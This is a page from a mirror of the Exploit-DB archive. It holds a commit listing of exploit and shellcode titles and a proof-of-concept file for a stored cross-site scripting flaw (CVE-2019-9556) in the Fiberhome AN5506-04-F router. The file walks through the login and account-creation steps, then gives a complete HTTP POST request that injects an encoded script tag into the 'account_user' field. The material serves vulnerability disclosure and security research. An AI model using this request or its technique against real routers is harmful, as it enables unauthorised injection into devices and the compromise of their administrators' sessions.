bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/46498.txt
Offensive Security a37e3008e5 DB: 2019-03-05 
20 changes to exploits/shellcodes

Microsoft Edge Chakra 1.11.4 - Read Permission via Type Confusion

FileZilla 3.40.0 - 'Local search' / 'Local site' Denial of Service (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation
STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (1)

STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2)

symphony CMS 2.3 - Multiple Vulnerabilities
Symphony CMS 2.3 - Multiple Vulnerabilities

Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities

Raisecom  XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution

zzzphp CMS 1.6.1 - Cross-Site Request Forgery

Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload)

Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit)

OOP CMS BLOG 1.0 - Multiple SQL Injection

OOP CMS BLOG 1.0 - Multiple Cross-Site Request Forgery
CMSsite 1.0 - Multiple Cross-Site Request Forgery
elFinder 2.1.47 - Command Injection vulnerability in the PHP connector
MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal
Bolt CMS 3.6.4 - Cross-Site Scripting
Craft CMS 3.1.12 Pro - Cross-Site Scripting
WordPress Plugin Cerber Security_ Antispam & Malware Scan 8.0 - Multiple Bypass Vulnerabilities
Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting

Linux/x86 - NOT Encoder / Decoder - execve() /bin/sh Shellcode (44 bytes)

Linux/x64 - Kill All Processes Shellcode (11 bytes)

Linux/x86 - iptables -F Shellcode (43 bytes)
2019-03-05 05:01:50 +00:00

41 lines
No EOL
1.8 KiB
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: Fiberhome AN5506-04-F - Stored Cross Site Scripting
# Date: 04.03.2019
# Exploit Author: Tauco
# Vendor Homepage: http://www.fiberhomegroup.com/en/
# Version: RP2669
# Tested on: Windows 10
# CVE : CVE-2019-9556
Description:
===========================================================================
Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the web site and run within the users browser under the privileges of the web application.
https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)
Proof of concept :
===========================================================================
1. Login with credential 192.168.1.1
2. Go to Management
3. Open User Account
4. Add user
5. Inject the post parameter "account_user"
6. Encode Url <script>alert("XSS")</script>
POST /goform/setUser HTTP/1.1
Host: 192.168.1.1
Content-Length: 101
Cache-Control: max-age=0
Origin: http://192.168.1.1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.1.1/management/account_admin.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: loginName=admin
Connection: close
account_user=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%58%53%53%22%29%3c%2f%73%63%72%69%70%74%3e&account_pwd=password123&account_pwd2=password123&btnApply1=Apply&curIndex=new
Reference in a new issue View git blame Copy permalink